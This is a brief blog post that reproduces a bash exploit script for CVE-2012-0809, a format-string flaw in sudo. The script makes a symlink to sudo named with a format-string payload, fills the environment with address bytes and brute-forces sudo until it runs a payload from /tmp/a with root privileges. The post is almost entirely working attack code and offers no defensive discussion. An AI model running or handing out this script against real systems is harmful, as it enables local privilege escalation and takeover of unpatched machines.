CVE-2012-0809 Exploit

April 28, 2014 - 1 minute read -
exploit
#!/bin/bash
# CVE-2012-0809 exploit 
# joernchen of Phenoelit's version 
# Payload to be executed goes to /tmp/a (might be a shell script)

cd /tmp
/bin/echo '-> Clearing ENV'
for i in `env |cut -f1 -d "="` ;do unset $i;done  
/bin/echo '-> Creating symlink'
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do 
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;

/bin/echo '-> Now a little Brute-Force'
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi  ; done
/bin/echo '-> Cleaning up'
/bin/rm /tmp/%134520134x%900\$n